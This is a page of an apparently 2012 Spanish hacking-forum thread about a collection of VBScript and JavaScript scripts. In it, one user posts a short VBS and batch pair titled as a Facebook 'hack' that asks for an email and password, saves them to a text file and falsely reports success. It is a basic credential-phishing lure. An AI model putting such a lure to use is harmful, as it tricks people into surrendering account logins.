elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.  (Leído 11,268 veces)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.824



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #10 en: 23 Febrero 2012, 20:10 pm »

Pitoloko tu podrias compartir todos tus script en Vbscript ?

Todos son 2 o 3, Y también están en ingles xD

saludosss


En línea

Geormarsch

Desconectado Desconectado

Mensajes: 160



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #11 en: 23 Febrero 2012, 20:19 pm »

Bueno con mayor razon,si son pocos podrias compartirlos.saluds


En línea

"Comentar el código es como limpiar el cuarto de baño; nadie quiere hacerlo, pero el resultado es siempre una experiencia más agradable para uno mismo y sus invitados"
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.824



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #12 en: 23 Febrero 2012, 20:38 pm »

borrar_archivos_y_mostrar_peso_de_archivos_borrado

conseguir_informacion_de_un_acceso_directo_lnk

solucionado_vbs_como_hacer_este_bucle


el otro script que tengo es el típico para ejecutar archivos ocultos.

Creo que no tengo más cosas buenas en vbs

un saludo
En línea

Geormarsch

Desconectado Desconectado

Mensajes: 160



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #13 en: 23 Febrero 2012, 20:50 pm »

Ok,gracias.
saluds
En línea

"Comentar el código es como limpiar el cuarto de baño; nadie quiere hacerlo, pero el resultado es siempre una experiencia más agradable para uno mismo y sus invitados"
Geormarsch

Desconectado Desconectado

Mensajes: 160



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #14 en: 23 Febrero 2012, 21:18 pm »

Yo tengo este script que se mezcla con Batch

Askpass.vbs
Código
  1. Set var = CreateObject("ScriptPW.Password")
  2. WScript.StdOut.Write "iNGRESA TU CONTRASEÑA:"
  3. pass = var.GetPassword()
  4. Set objfso = createobject ("scripting.filesystemobject")
  5. Set Archivotexto = objfso.createtextfile ("Passes.txt",true)
  6. archivotexto.writeline pass
  7.  

Nombre.bat
Código
  1. @echo off
  2. color a
  3. title Hack Apps ^& Games Fb.com
  4. set /p email= iNGRESA TU EMAIL :
  5. CScript //nologo Askpass.vbs
  6. echo %email%>>Passes.txt
  7. echo Hack Completado verifique su cuenta
  8. start www.fb.com
  9.  

Como veran jojojo no es un hack solamente pide E-mail y Pass de tu Facebook.com
y lo almazena en un Txt...
no se si a alguien le sirve Salu2
En línea

"Comentar el código es como limpiar el cuarto de baño; nadie quiere hacerlo, pero el resultado es siempre una experiencia más agradable para uno mismo y sus invitados"
Ambra1803

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #15 en: 26 Febrero 2012, 01:38 am »

No hay manera de poder bajar los scripts, los links de los servidores para descargarlo no funcionan. ¿Puedes decirme por dónde podría descargarlos por favor?.
Gracias.
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.824



Ver Perfil
Re: [VBS] [JS] Recopilación de 1.735 Scripts para aprender.
« Respuesta #16 en: 26 Febrero 2012, 06:09 am »


Cita de: YO
http://www.scriptcode.com/vbscripteditor/

Solo tienes que instalarte la versión Trial, y aqui verás los scripts:

Código:
C:\Program Files\ExeScript Editor\ScriptCenter

Salu2
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
scripts para principiantes...
PHP
H4RR13R 2 2,834 Último mensaje 12 Noviembre 2007, 02:18 am
por Red Mx
Recopilacion de Icono para VB::..
Programación Visual Basic
Yasser Llanes 3 9,242 Último mensaje 21 Diciembre 2008, 19:39 pm
por CICOLO_111234
Recopilación de herramientas para hacking web « 1 2 »
Nivel Web
hakais 15 17,004 Último mensaje 5 Julio 2010, 19:38 pm
por s0mbradehackul
me podrian decir donde hay mas scripts para aprender sobre auditoria web?
Nivel Web
Belial & Grimoire 0 2,449 Último mensaje 17 Febrero 2012, 21:26 pm
por Belial & Grimoire
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines